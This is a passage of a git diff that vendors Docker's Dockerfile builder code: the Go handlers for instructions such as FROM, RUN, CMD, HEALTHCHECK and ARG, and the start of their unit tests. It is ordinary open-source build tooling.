+		commitStr += " " + newVar
+
+		b.runConfig.Labels[args[j]] = args[j+1]
+		j++
+	}
+	return b.commit("", b.runConfig.Cmd, commitStr)
+}
+
+// ADD foo /path
+//
+// Add the file 'foo' to '/path'. Tarball and Remote URL (git, http) handling
+// exist here. If you do not wish to have this automatic handling, use COPY.
+//
+func add(b *Builder, args []string, attributes map[string]bool, original string) error {
+	if len(args) < 2 {
+		return errAtLeastTwoArguments("ADD")
+	}
+
+	if err := b.flags.Parse(); err != nil {
+		return err
+	}
+
+	return b.runContextCommand(args, true, true, "ADD")
+}
+
+// COPY foo /path
+//
+// Same as 'ADD' but without the tar and remote url handling.
+//
+func dispatchCopy(b *Builder, args []string, attributes map[string]bool, original string) error {
+	if len(args) < 2 {
+		return errAtLeastTwoArguments("COPY")
+	}
+
+	if err := b.flags.Parse(); err != nil {
+		return err
+	}
+
+	return b.runContextCommand(args, false, false, "COPY")
+}
+
+// FROM imagename
+//
+// This sets the image the dockerfile will build on top of.
+//
+func from(b *Builder, args []string, attributes map[string]bool, original string) error {
+	if len(args) != 1 {
+		return errExactlyOneArgument("FROM")
+	}
+
+	if err := b.flags.Parse(); err != nil {
+		return err
+	}
+
+	name := args[0]
+
+	var (
+		image builder.Image
+		err   error
+	)
+
+	// Windows cannot support a container with no base image.
+	if name == api.NoBaseImageSpecifier {
+		if runtime.GOOS == "windows" {
+			return fmt.Errorf("Windows does not support FROM scratch")
+		}
+		b.image = ""
+		b.noBaseImage = true
+	} else {
+		// TODO: don't use `name`, instead resolve it to a digest
+		if !b.options.PullParent {
+			image, err = b.docker.GetImageOnBuild(name)
+			// TODO: shouldn't we error out if error is different from "not found" ?
+		}
+		if image == nil {
+			image, err = b.docker.PullOnBuild(b.clientCtx, name, b.options.AuthConfigs, b.Output)
+			if err != nil {
+				return err
+			}
+		}
+	}
+	b.from = image
+
+	return b.processImageFrom(image)
+}
+
+// ONBUILD RUN echo yo
+//
+// ONBUILD triggers run when the image is used in a FROM statement.
+//
+// ONBUILD handling has a lot of special-case functionality, the heading in
+// evaluator.go and comments around dispatch() in the same file explain the
+// special cases. search for 'OnBuild' in internals.go for additional special
+// cases.
+//
+func onbuild(b *Builder, args []string, attributes map[string]bool, original string) error {
+	if len(args) == 0 {
+		return errAtLeastOneArgument("ONBUILD")
+	}
+
+	if err := b.flags.Parse(); err != nil {
+		return err
+	}
+
+	triggerInstruction := strings.ToUpper(strings.TrimSpace(args[0]))
+	switch triggerInstruction {
+	case "ONBUILD":
+		return fmt.Errorf("Chaining ONBUILD via `ONBUILD ONBUILD` isn't allowed")
+	case "MAINTAINER", "FROM":
+		return fmt.Errorf("%s isn't allowed as an ONBUILD trigger", triggerInstruction)
+	}
+
+	original = regexp.MustCompile(`(?i)^\s*ONBUILD\s*`).ReplaceAllString(original, "")
+
+	b.runConfig.OnBuild = append(b.runConfig.OnBuild, original)
+	return b.commit("", b.runConfig.Cmd, fmt.Sprintf("ONBUILD %s", original))
+}
+
+// WORKDIR /tmp
+//
+// Set the working directory for future RUN/CMD/etc statements.
+//
+func workdir(b *Builder, args []string, attributes map[string]bool, original string) error {
+	if len(args) != 1 {
+		return errExactlyOneArgument("WORKDIR")
+	}
+
+	err := b.flags.Parse()
+	if err != nil {
+		return err
+	}
+
+	// This is from the Dockerfile and will not necessarily be in platform
+	// specific semantics, hence ensure it is converted.
+	b.runConfig.WorkingDir, err = normaliseWorkdir(b.runConfig.WorkingDir, args[0])
+	if err != nil {
+		return err
+	}
+
+	// For performance reasons, we explicitly do a create/mkdir now
+	// This avoids having an unnecessary expensive mount/unmount calls
+	// (on Windows in particular) during each container create.
+	// Prior to 1.13, the mkdir was deferred and not executed at this step.
+	if b.disableCommit {
+		// Don't call back into the daemon if we're going through docker commit --change "WORKDIR /foo".
+		// We've already updated the runConfig and that's enough.
+		return nil
+	}
+	b.runConfig.Image = b.image
+
+	cmd := b.runConfig.Cmd
+	comment := "WORKDIR " + b.runConfig.WorkingDir
+	// reset the command for cache detection
+	b.runConfig.Cmd = strslice.StrSlice(append(getShell(b.runConfig), "#(nop) "+comment))
+	defer func(cmd strslice.StrSlice) { b.runConfig.Cmd = cmd }(cmd)
+
+	if hit, err := b.probeCache(); err != nil {
+		return err
+	} else if hit {
+		return nil
+	}
+
+	container, err := b.docker.ContainerCreate(types.ContainerCreateConfig{Config: b.runConfig})
+	if err != nil {
+		return err
+	}
+	b.tmpContainers[container.ID] = struct{}{}
+	if err := b.docker.ContainerCreateWorkdir(container.ID); err != nil {
+		return err
+	}
+
+	return b.commit(container.ID, cmd, comment)
+}
+
+// RUN some command yo
+//
+// run a command and commit the image. Args are automatically prepended with
+// the current SHELL which defaults to 'sh -c' under linux or 'cmd /S /C' under
+// Windows, in the event there is only one argument The difference in processing:
+//
+// RUN echo hi          # sh -c echo hi       (Linux)
+// RUN echo hi          # cmd /S /C echo hi   (Windows)
+// RUN [ "echo", "hi" ] # echo hi
+//
+func run(b *Builder, args []string, attributes map[string]bool, original string) error {
+	if b.image == "" && !b.noBaseImage {
+		return fmt.Errorf("Please provide a source image with `from` prior to run")
+	}
+
+	if err := b.flags.Parse(); err != nil {
+		return err
+	}
+
+	args = handleJSONArgs(args, attributes)
+
+	if !attributes["json"] {
+		args = append(getShell(b.runConfig), args...)
+	}
+	config := &container.Config{
+		Cmd:   strslice.StrSlice(args),
+		Image: b.image,
+	}
+
+	// stash the cmd
+	cmd := b.runConfig.Cmd
+	if len(b.runConfig.Entrypoint) == 0 && len(b.runConfig.Cmd) == 0 {
+		b.runConfig.Cmd = config.Cmd
+	}
+
+	// stash the config environment
+	env := b.runConfig.Env
+
+	defer func(cmd strslice.StrSlice) { b.runConfig.Cmd = cmd }(cmd)
+	defer func(env []string) { b.runConfig.Env = env }(env)
+
+	// derive the net build-time environment for this run. We let config
+	// environment override the build time environment.
+	// This means that we take the b.buildArgs list of env vars and remove
+	// any of those variables that are defined as part of the container. In other
+	// words, anything in b.Config.Env. What's left is the list of build-time env
+	// vars that we need to add to each RUN command - note the list could be empty.
+	//
+	// We don't persist the build time environment with container's config
+	// environment, but just sort and prepend it to the command string at time
+	// of commit.
+	// This helps with tracing back the image's actual environment at the time
+	// of RUN, without leaking it to the final image. It also aids cache
+	// lookup for same image built with same build time environment.
+	cmdBuildEnv := []string{}
+	configEnv := runconfigopts.ConvertKVStringsToMap(b.runConfig.Env)
+	for key, val := range b.options.BuildArgs {
+		if !b.isBuildArgAllowed(key) {
+			// skip build-args that are not in allowed list, meaning they have
+			// not been defined by an "ARG" Dockerfile command yet.
+			// This is an error condition but only if there is no "ARG" in the entire
+			// Dockerfile, so we'll generate any necessary errors after we parsed
+			// the entire file (see 'leftoverArgs' processing in evaluator.go )
+			continue
+		}
+		if _, ok := configEnv[key]; !ok && val != nil {
+			cmdBuildEnv = append(cmdBuildEnv, fmt.Sprintf("%s=%s", key, *val))
+		}
+	}
+
+	// derive the command to use for probeCache() and to commit in this container.
+	// Note that we only do this if there are any build-time env vars.  Also, we
+	// use the special argument "|#" at the start of the args array. This will
+	// avoid conflicts with any RUN command since commands can not
+	// start with | (vertical bar). The "#" (number of build envs) is there to
+	// help ensure proper cache matches. We don't want a RUN command
+	// that starts with "foo=abc" to be considered part of a build-time env var.
+	saveCmd := config.Cmd
+	if len(cmdBuildEnv) > 0 {
+		sort.Strings(cmdBuildEnv)
+		tmpEnv := append([]string{fmt.Sprintf("|%d", len(cmdBuildEnv))}, cmdBuildEnv...)
+		saveCmd = strslice.StrSlice(append(tmpEnv, saveCmd...))
+	}
+
+	b.runConfig.Cmd = saveCmd
+	hit, err := b.probeCache()
+	if err != nil {
+		return err
+	}
+	if hit {
+		return nil
+	}
+
+	// set Cmd manually, this is special case only for Dockerfiles
+	b.runConfig.Cmd = config.Cmd
+	// set build-time environment for 'run'.
+	b.runConfig.Env = append(b.runConfig.Env, cmdBuildEnv...)
+	// set config as already being escaped, this prevents double escaping on windows
+	b.runConfig.ArgsEscaped = true
+
+	logrus.Debugf("[BUILDER] Command to be executed: %v", b.runConfig.Cmd)
+
+	cID, err := b.create()
+	if err != nil {
+		return err
+	}
+
+	if err := b.run(cID); err != nil {
+		return err
+	}
+
+	// revert to original config environment and set the command string to
+	// have the build-time env vars in it (if any) so that future cache look-ups
+	// properly match it.
+	b.runConfig.Env = env
+	b.runConfig.Cmd = saveCmd
+	return b.commit(cID, cmd, "run")
+}
+
+// CMD foo
+//
+// Set the default command to run in the container (which may be empty).
+// Argument handling is the same as RUN.
+//
+func cmd(b *Builder, args []string, attributes map[string]bool, original string) error {
+	if err := b.flags.Parse(); err != nil {
+		return err
+	}
+
+	cmdSlice := handleJSONArgs(args, attributes)
+
+	if !attributes["json"] {
+		cmdSlice = append(getShell(b.runConfig), cmdSlice...)
+	}
+
+	b.runConfig.Cmd = strslice.StrSlice(cmdSlice)
+	// set config as already being escaped, this prevents double escaping on windows
+	b.runConfig.ArgsEscaped = true
+
+	if err := b.commit("", b.runConfig.Cmd, fmt.Sprintf("CMD %q", cmdSlice)); err != nil {
+		return err
+	}
+
+	if len(args) != 0 {
+		b.cmdSet = true
+	}
+
+	return nil
+}
+
+// parseOptInterval(flag) is the duration of flag.Value, or 0 if
+// empty. An error is reported if the value is given and is not positive.
+func parseOptInterval(f *Flag) (time.Duration, error) {
+	s := f.Value
+	if s == "" {
+		return 0, nil
+	}
+	d, err := time.ParseDuration(s)
+	if err != nil {
+		return 0, err
+	}
+	if d <= 0 {
+		return 0, fmt.Errorf("Interval %#v must be positive", f.name)
+	}
+	return d, nil
+}
+
+// HEALTHCHECK foo
+//
+// Set the default healthcheck command to run in the container (which may be empty).
+// Argument handling is the same as RUN.
+//
+func healthcheck(b *Builder, args []string, attributes map[string]bool, original string) error {
+	if len(args) == 0 {
+		return errAtLeastOneArgument("HEALTHCHECK")
+	}
+	typ := strings.ToUpper(args[0])
+	args = args[1:]
+	if typ == "NONE" {
+		if len(args) != 0 {
+			return fmt.Errorf("HEALTHCHECK NONE takes no arguments")
+		}
+		test := strslice.StrSlice{typ}
+		b.runConfig.Healthcheck = &container.HealthConfig{
+			Test: test,
+		}
+	} else {
+		if b.runConfig.Healthcheck != nil {
+			oldCmd := b.runConfig.Healthcheck.Test
+			if len(oldCmd) > 0 && oldCmd[0] != "NONE" {
+				fmt.Fprintf(b.Stdout, "Note: overriding previous HEALTHCHECK: %v\n", oldCmd)
+			}
+		}
+
+		healthcheck := container.HealthConfig{}
+
+		flInterval := b.flags.AddString("interval", "")
+		flTimeout := b.flags.AddString("timeout", "")
+		flRetries := b.flags.AddString("retries", "")
+
+		if err := b.flags.Parse(); err != nil {
+			return err
+		}
+
+		switch typ {
+		case "CMD":
+			cmdSlice := handleJSONArgs(args, attributes)
+			if len(cmdSlice) == 0 {
+				return fmt.Errorf("Missing command after HEALTHCHECK CMD")
+			}
+
+			if !attributes["json"] {
+				typ = "CMD-SHELL"
+			}
+
+			healthcheck.Test = strslice.StrSlice(append([]string{typ}, cmdSlice...))
+		default:
+			return fmt.Errorf("Unknown type %#v in HEALTHCHECK (try CMD)", typ)
+		}
+
+		interval, err := parseOptInterval(flInterval)
+		if err != nil {
+			return err
+		}
+		healthcheck.Interval = interval
+
+		timeout, err := parseOptInterval(flTimeout)
+		if err != nil {
+			return err
+		}
+		healthcheck.Timeout = timeout
+
+		if flRetries.Value != "" {
+			retries, err := strconv.ParseInt(flRetries.Value, 10, 32)
+			if err != nil {
+				return err
+			}
+			if retries < 1 {
+				return fmt.Errorf("--retries must be at least 1 (not %d)", retries)
+			}
+			healthcheck.Retries = int(retries)
+		} else {
+			healthcheck.Retries = 0
+		}
+
+		b.runConfig.Healthcheck = &healthcheck
+	}
+
+	return b.commit("", b.runConfig.Cmd, fmt.Sprintf("HEALTHCHECK %q", b.runConfig.Healthcheck))
+}
+
+// ENTRYPOINT /usr/sbin/nginx
+//
+// Set the entrypoint to /usr/sbin/nginx. Will accept the CMD as the arguments
+// to /usr/sbin/nginx. Uses the default shell if not in JSON format.
+//
+// Handles command processing similar to CMD and RUN, only b.runConfig.Entrypoint
+// is initialized at NewBuilder time instead of through argument parsing.
+//
+func entrypoint(b *Builder, args []string, attributes map[string]bool, original string) error {
+	if err := b.flags.Parse(); err != nil {
+		return err
+	}
+
+	parsed := handleJSONArgs(args, attributes)
+
+	switch {
+	case attributes["json"]:
+		// ENTRYPOINT ["echo", "hi"]
+		b.runConfig.Entrypoint = strslice.StrSlice(parsed)
+	case len(parsed) == 0:
+		// ENTRYPOINT []
+		b.runConfig.Entrypoint = nil
+	default:
+		// ENTRYPOINT echo hi
+		b.runConfig.Entrypoint = strslice.StrSlice(append(getShell(b.runConfig), parsed[0]))
+	}
+
+	// when setting the entrypoint if a CMD was not explicitly set then
+	// set the command to nil
+	if !b.cmdSet {
+		b.runConfig.Cmd = nil
+	}
+
+	if err := b.commit("", b.runConfig.Cmd, fmt.Sprintf("ENTRYPOINT %q", b.runConfig.Entrypoint)); err != nil {
+		return err
+	}
+
+	return nil
+}
+
+// EXPOSE 6667/tcp 7000/tcp
+//
+// Expose ports for links and port mappings. This all ends up in
+// b.runConfig.ExposedPorts for runconfig.
+//
+func expose(b *Builder, args []string, attributes map[string]bool, original string) error {
+	portsTab := args
+
+	if len(args) == 0 {
+		return errAtLeastOneArgument("EXPOSE")
+	}
+
+	if err := b.flags.Parse(); err != nil {
+		return err
+	}
+
+	if b.runConfig.ExposedPorts == nil {
+		b.runConfig.ExposedPorts = make(nat.PortSet)
+	}
+
+	ports, _, err := nat.ParsePortSpecs(portsTab)
+	if err != nil {
+		return err
+	}
+
+	// instead of using ports directly, we build a list of ports and sort it so
+	// the order is consistent. This prevents cache burst where map ordering
+	// changes between builds
+	portList := make([]string, len(ports))
+	var i int
+	for port := range ports {
+		if _, exists := b.runConfig.ExposedPorts[port]; !exists {
+			b.runConfig.ExposedPorts[port] = struct{}{}
+		}
+		portList[i] = string(port)
+		i++
+	}
+	sort.Strings(portList)
+	return b.commit("", b.runConfig.Cmd, fmt.Sprintf("EXPOSE %s", strings.Join(portList, " ")))
+}
+
+// USER foo
+//
+// Set the user to 'foo' for future commands and when running the
+// ENTRYPOINT/CMD at container run time.
+//
+func user(b *Builder, args []string, attributes map[string]bool, original string) error {
+	if len(args) != 1 {
+		return errExactlyOneArgument("USER")
+	}
+
+	if err := b.flags.Parse(); err != nil {
+		return err
+	}
+
+	b.runConfig.User = args[0]
+	return b.commit("", b.runConfig.Cmd, fmt.Sprintf("USER %v", args))
+}
+
+// VOLUME /foo
+//
+// Expose the volume /foo for use. Will also accept the JSON array form.
+//
+func volume(b *Builder, args []string, attributes map[string]bool, original string) error {
+	if len(args) == 0 {
+		return errAtLeastOneArgument("VOLUME")
+	}
+
+	if err := b.flags.Parse(); err != nil {
+		return err
+	}
+
+	if b.runConfig.Volumes == nil {
+		b.runConfig.Volumes = map[string]struct{}{}
+	}
+	for _, v := range args {
+		v = strings.TrimSpace(v)
+		if v == "" {
+			return fmt.Errorf("VOLUME specified can not be an empty string")
+		}
+		b.runConfig.Volumes[v] = struct{}{}
+	}
+	if err := b.commit("", b.runConfig.Cmd, fmt.Sprintf("VOLUME %v", args)); err != nil {
+		return err
+	}
+	return nil
+}
+
+// STOPSIGNAL signal
+//
+// Set the signal that will be used to kill the container.
+func stopSignal(b *Builder, args []string, attributes map[string]bool, original string) error {
+	if len(args) != 1 {
+		return errExactlyOneArgument("STOPSIGNAL")
+	}
+
+	sig := args[0]
+	_, err := signal.ParseSignal(sig)
+	if err != nil {
+		return err
+	}
+
+	b.runConfig.StopSignal = sig
+	return b.commit("", b.runConfig.Cmd, fmt.Sprintf("STOPSIGNAL %v", args))
+}
+
+// ARG name[=value]
+//
+// Adds the variable foo to the trusted list of variables that can be passed
+// to builder using the --build-arg flag for expansion/subsitution or passing to 'run'.
+// Dockerfile author may optionally set a default value of this variable.
+func arg(b *Builder, args []string, attributes map[string]bool, original string) error {
+	if len(args) != 1 {
+		return errExactlyOneArgument("ARG")
+	}
+
+	var (
+		name       string
+		newValue   string
+		hasDefault bool
+	)
+
+	arg := args[0]
+	// 'arg' can just be a name or name-value pair. Note that this is different
+	// from 'env' that handles the split of name and value at the parser level.
+	// The reason for doing it differently for 'arg' is that we support just
+	// defining an arg and not assign it a value (while 'env' always expects a
+	// name-value pair). If possible, it will be good to harmonize the two.
+	if strings.Contains(arg, "=") {
+		parts := strings.SplitN(arg, "=", 2)
+		if len(parts[0]) == 0 {
+			return errBlankCommandNames("ARG")
+		}
+
+		name = parts[0]
+		newValue = parts[1]
+		hasDefault = true
+	} else {
+		name = arg
+		hasDefault = false
+	}
+	// add the arg to allowed list of build-time args from this step on.
+	b.allowedBuildArgs[name] = true
+
+	// If there is a default value associated with this arg then add it to the
+	// b.buildArgs if one is not already passed to the builder. The args passed
+	// to builder override the default value of 'arg'. Note that a 'nil' for
+	// a value means that the user specified "--build-arg FOO" and "FOO" wasn't
+	// defined as an env var - and in that case we DO want to use the default
+	// value specified in the ARG cmd.
+	if baValue, ok := b.options.BuildArgs[name]; (!ok || baValue == nil) && hasDefault {
+		b.options.BuildArgs[name] = &newValue
+	}
+
+	return b.commit("", b.runConfig.Cmd, fmt.Sprintf("ARG %s", arg))
+}
+
+// SHELL powershell -command
+//
+// Set the non-default shell to use.
+func shell(b *Builder, args []string, attributes map[string]bool, original string) error {
+	if err := b.flags.Parse(); err != nil {
+		return err
+	}
+	shellSlice := handleJSONArgs(args, attributes)
+	switch {
+	case len(shellSlice) == 0:
+		// SHELL []
+		return errAtLeastOneArgument("SHELL")
+	case attributes["json"]:
+		// SHELL ["powershell", "-command"]
+		b.runConfig.Shell = strslice.StrSlice(shellSlice)
+	default:
+		// SHELL powershell -command - not JSON
+		return errNotJSON("SHELL", original)
+	}
+	return b.commit("", b.runConfig.Cmd, fmt.Sprintf("SHELL %v", shellSlice))
+}
+
+func errAtLeastOneArgument(command string) error {
+	return fmt.Errorf("%s requires at least one argument", command)
+}
+
+func errExactlyOneArgument(command string) error {
+	return fmt.Errorf("%s requires exactly one argument", command)
+}
+
+func errAtLeastTwoArguments(command string) error {
+	return fmt.Errorf("%s requires at least two arguments", command)
+}
+
+func errBlankCommandNames(command string) error {
+	return fmt.Errorf("%s names can not be blank", command)
+}
+
+func errTooManyArguments(command string) error {
+	return fmt.Errorf("Bad input to %s, too many arguments", command)
+}
+
+// getShell is a helper function which gets the right shell for prefixing the
+// shell-form of RUN, ENTRYPOINT and CMD instructions
+func getShell(c *container.Config) []string {
+	if 0 == len(c.Shell) {
+		return defaultShell[:]
+	}
+	return c.Shell[:]
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_test.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_test.go
new file mode 100644
index 0000000000..f7c57f7e3b
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_test.go
@@ -0,0 +1,517 @@
+package dockerfile
+
+import (
+	"fmt"
+	"runtime"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/strslice"
+	"github.com/docker/go-connections/nat"
+)
+
+type commandWithFunction struct {
+	name     string
+	function func(args []string) error
+}
+
+func TestCommandsExactlyOneArgument(t *testing.T) {
+	commands := []commandWithFunction{
+		{"MAINTAINER", func(args []string) error { return maintainer(nil, args, nil, "") }},
+		{"FROM", func(args []string) error { return from(nil, args, nil, "") }},
+		{"WORKDIR", func(args []string) error { return workdir(nil, args, nil, "") }},
+		{"USER", func(args []string) error { return user(nil, args, nil, "") }},
+		{"STOPSIGNAL", func(args []string) error { return stopSignal(nil, args, nil, "") }}}
+
+	for _, command := range commands {
+		err := command.function([]string{})
+
+		if err == nil {
+			t.Fatalf("Error should be present for %s command", command.name)
+		}
+
+		expectedError := errExactlyOneArgument(command.name)
+
+		if err.Error() != expectedError.Error() {
+			t.Fatalf("Wrong error message for %s. Got: %s. Should be: %s", command.name, err.Error(), expectedError)
+		}
+	}
+}
+
+func TestCommandsAtLeastOneArgument(t *testing.T) {
+	commands := []commandWithFunction{
+		{"ENV", func(args []string) error { return env(nil, args, nil, "") }},
+		{"LABEL", func(args []string) error { return label(nil, args, nil, "") }},
+		{"ONBUILD", func(args []string) error { return onbuild(nil, args, nil, "") }},
+		{"HEALTHCHECK", func(args []string) error { return healthcheck(nil, args, nil, "") }},
+		{"EXPOSE", func(args []string) error { return expose(nil, args, nil, "") }},
+		{"VOLUME", func(args []string) error { return volume(nil, args, nil, "") }}}
+
+	for _, command := range commands {
+		err := command.function([]string{})
+
+		if err == nil {
+			t.Fatalf("Error should be present for %s command", command.name)
+		}
+
+		expectedError := errAtLeastOneArgument(command.name)
+
+		if err.Error() != expectedError.Error() {
+			t.Fatalf("Wrong error message for %s. Got: %s. Should be: %s", command.name, err.Error(), expectedError)
+		}
+	}
+}
+
+func TestCommandsAtLeastTwoArguments(t *testing.T) {
+	commands := []commandWithFunction{
+		{"ADD", func(args []string) error { return add(nil, args, nil, "") }},
+		{"COPY", func(args []string) error { return dispatchCopy(nil, args, nil, "") }}}
+
+	for _, command := range commands {
+		err := command.function([]string{"arg1"})
+
+		if err == nil {
+			t.Fatalf("Error should be present for %s command", command.name)
+		}
+
+		expectedError := errAtLeastTwoArguments(command.name)
+
+		if err.Error() != expectedError.Error() {
+			t.Fatalf("Wrong error message for %s. Got: %s. Should be: %s", command.name, err.Error(), expectedError)
+		}
+	}
+}
+
+func TestCommandsTooManyArguments(t *testing.T) {
+	commands := []commandWithFunction{
+		{"ENV", func(args []string) error { return env(nil, args, nil, "") }},
+		{"LABEL", func(args []string) error { return label(nil, args, nil, "") }}}
+
+	for _, command := range commands {
+		err := command.function([]string{"arg1", "arg2", "arg3"})
+
+		if err == nil {
+			t.Fatalf("Error should be present for %s command", command.name)
+		}
+
+		expectedError := errTooManyArguments(command.name)
+
+		if err.Error() != expectedError.Error() {
+			t.Fatalf("Wrong error message for %s. Got: %s. Should be: %s", command.name, err.Error(), expectedError)
+		}
+	}
+}
+
+func TestCommandseBlankNames(t *testing.T) {
+	bflags := &BFlags{}
+	config := &container.Config{}
+
+	b := &Builder{flags: bflags, runConfig: config, disableCommit: true}
+
+	commands := []commandWithFunction{
+		{"ENV", func(args []string) error { return env(b, args, nil, "") }},
+		{"LABEL", func(args []string) error { return label(b, args, nil, "") }},
+	}
+
+	for _, command := range commands {
+		err := command.function([]string{"", ""})
+
+		if err == nil {
+			t.Fatalf("Error should be present for %s command", command.name)
+		}
+
+		expectedError := errBlankCommandNames(command.name)
+
+		if err.Error() != expectedError.Error() {
+			t.Fatalf("Wrong error message for %s. Got: %s. Should be: %s", command.name, err.Error(), expectedError)
+		}
+	}
+}
+
+func TestEnv2Variables(t *testing.T) {
+	variables := []string{"var1", "val1", "var2", "val2"}
+
+	bflags := &BFlags{}
+	config := &container.Config{}
+
+	b := &Builder{flags: bflags, runConfig: config, disableCommit: true}
+
+	if err := env(b, variables, nil, ""); err != nil {
+		t.Fatalf("Error when executing env: %s", err.Error())
+	}
+
+	expectedVar1 := fmt.Sprintf("%s=%s", variables[0], variables[1])
+	expectedVar2 := fmt.Sprintf("%s=%s", variables[2], variables[3])
+
+	if b.runConfig.Env[0] != expectedVar1 {
+		t.Fatalf("Wrong env output for first variable. Got: %s. Should be: %s", b.runConfig.Env[0], expectedVar1)
+	}
+
+	if b.runConfig.Env[1] != expectedVar2 {
+		t.Fatalf("Wrong env output for second variable. Got: %s, Should be: %s", b.runConfig.Env[1], expectedVar2)
+	}
+}
+
+func TestMaintainer(t *testing.T) {
+	maintainerEntry := "Some Maintainer <maintainer@example.com>"
+
+	b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true}
+
+	if err := maintainer(b, []string{maintainerEntry}, nil, ""); err != nil {
+		t.Fatalf("Error when executing maintainer: %s", err.Error())
+	}
+
+	if b.maintainer != maintainerEntry {
+		t.Fatalf("Maintainer in builder should be set to %s. Got: %s", maintainerEntry, b.maintainer)
+	}
+}
+
+func TestLabel(t *testing.T) {
+	labelName := "label"
+	labelValue := "value"
+
+	labelEntry := []string{labelName, labelValue}
+
+	b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true}
+
+	if err := label(b, labelEntry, nil, ""); err != nil {
+		t.Fatalf("Error when executing label: %s", err.Error())
+	}
+
+	if val, ok := b.runConfig.Labels[labelName]; ok {
+		if val != labelValue {
+			t.Fatalf("Label %s should have value %s, had %s instead", labelName, labelValue, val)
+		}
+	} else {
+		t.Fatalf("Label %s should be present but it is not", labelName)
+	}
+}
+
+func TestFrom(t *testing.T) {
+	b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true}
+
+	err := from(b, []string{"scratch"}, nil, "")
+
+	if runtime.GOOS == "windows" {
+		if err == nil {
+			t.Fatalf("Error not set on Windows")
+		}
+
+		expectedError := "Windows does not support FROM scratch"
+
+		if !strings.Contains(err.Error(), expectedError) {
+			t.Fatalf("Error message not correct on Windows. Should be: %s, got: %s", expectedError, err.Error())
+		}
+	} else {
+		if err != nil {
+			t.Fatalf("Error when executing from: %s", err.Error())
+		}
+
+		if b.image != "" {
+			t.Fatalf("Image shoule be empty, got: %s", b.image)
+		}
+
+		if b.noBaseImage != true {
+			t.Fatalf("Image should not have any base image, got: %v", b.noBaseImage)
+		}
+	}
+}
+
+func TestOnbuildIllegalTriggers(t *testing.T) {
+	triggers := []struct{ command, expectedError string }{
+		{"ONBUILD", "Chaining ONBUILD via `ONBUILD ONBUILD` isn't allowed"},
+		{"MAINTAINER", "MAINTAINER isn't allowed as an ONBUILD trigger"},
+		{"FROM", "FROM isn't allowed as an ONBUILD trigger"}}
+
+	for _, trigger := range triggers {
+		b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true}
+
+		err := onbuild(b, []string{trigger.command}, nil, "")
+
+		if err == nil {
+			t.Fatalf("Error should not be nil")
+		}
+
+		if !strings.Contains(err.Error(), trigger.expectedError) {
+			t.Fatalf("Error message not correct. Should be: %s, got: %s", trigger.expectedError, err.Error())
+		}
+	}
+}
+
+func TestOnbuild(t *testing.T) {
+	b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true}
+
+	err := onbuild(b, []string{"ADD", ".", "/app/src"}, nil, "ONBUILD ADD . /app/src")
+
+	if err != nil {
+		t.Fatalf("Error should be empty, got: %s", err.Error())
+	}
+
+	expectedOnbuild := "ADD . /app/src"
+
+	if b.runConfig.OnBuild[0] != expectedOnbuild {
+		t.Fatalf("Wrong ONBUILD command. Expected: %s, got: %s", expectedOnbuild, b.runConfig.OnBuild[0])
+	}
+}
+
+func TestWorkdir(t *testing.T) {
+	b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true}
+
+	workingDir := "/app"
+
+	if runtime.GOOS == "windows" {
+		workingDir = "C:\app"
+	}
+
+	err := workdir(b, []string{workingDir}, nil, "")
+
+	if err != nil {
+		t.Fatalf("Error should be empty, got: %s", err.Error())
+	}
+
+	if b.runConfig.WorkingDir != workingDir {
+		t.Fatalf("WorkingDir should be set to %s, got %s", workingDir, b.runConfig.WorkingDir)
+	}
+
+}
+
+func TestCmd(t *testing.T) {
+	b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true}
+
+	command := "./executable"
+
+	err := cmd(b, []string{command}, nil, "")
+
+	if err != nil {
+		t.Fatalf("Error should be empty, got: %s", err.Error())
+	}
+
+	var expectedCommand strslice.StrSlice
+
+	if runtime.GOOS == "windows" {
+		expectedCommand = strslice.StrSlice(append([]string{"cmd"}, "/S", "/C", command))
+	} else {
+		expectedCommand = strslice.StrSlice(append([]string{"/bin/sh"}, "-c", command))
+	}
+
+	if !compareStrSlice(b.runConfig.Cmd, expectedCommand) {
+		t.Fatalf("Command should be set to %s, got %s", command, b.runConfig.Cmd)
+	}
+
+	if !b.cmdSet {
+		t.Fatalf("Command should be marked as set")
+	}
+}
+
+func compareStrSlice(slice1, slice2 strslice.StrSlice) bool {
+	if len(slice1) != len(slice2) {
+		return false
+	}
+
+	for i := range slice1 {
+		if slice1[i] != slice2[i] {
+			return false
+		}
+	}
+
+	return true
+}
+
+func TestHealthcheckNone(t *testing.T) {
+	b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true}
+
+	if err := healthcheck(b, []string{"NONE"}, nil, ""); err != nil {
+		t.Fatalf("Error should be empty, got: %s", err.Error())
+	}
+
+	if b.runConfig.Healthcheck == nil {
+		t.Fatal("Healthcheck should be set, got nil")
+	}
+
+	expectedTest := strslice.StrSlice(append([]string{"NONE"}))
+
+	if !compareStrSlice(expectedTest, b.runConfig.Healthcheck.Test) {
+		t.Fatalf("Command should be set to %s, got %s", expectedTest, b.runConfig.Healthcheck.Test)
+	}
+}
+
+func TestHealthcheckCmd(t *testing.T) {
+	b := &Builder{flags: &BFlags{flags: make(map[string]*Flag)}, runConfig: &container.Config{}, disableCommit: true}
+
+	if err := healthcheck(b, []string{"CMD", "curl", "-f", "http://localhost/", "||", "exit", "1"}, nil, ""); err != nil {
+		t.Fatalf("Error should be empty, got: %s", err.Error())
+	}
+
+	if b.runConfig.Healthcheck == nil {
+		t.Fatal("Healthcheck should be set, got nil")
+	}
+
+	expectedTest := strslice.StrSlice(append([]string{"CMD-SHELL"}, "curl -f http://localhost/ || exit 1"))
+
+	if !compareStrSlice(expectedTest, b.runConfig.Healthcheck.Test) {
+		t.Fatalf("Command should be set to %s, got %s", expectedTest, b.runConfig.Healthcheck.Test)
+	}
+}
+
+func TestEntrypoint(t *testing.T) {
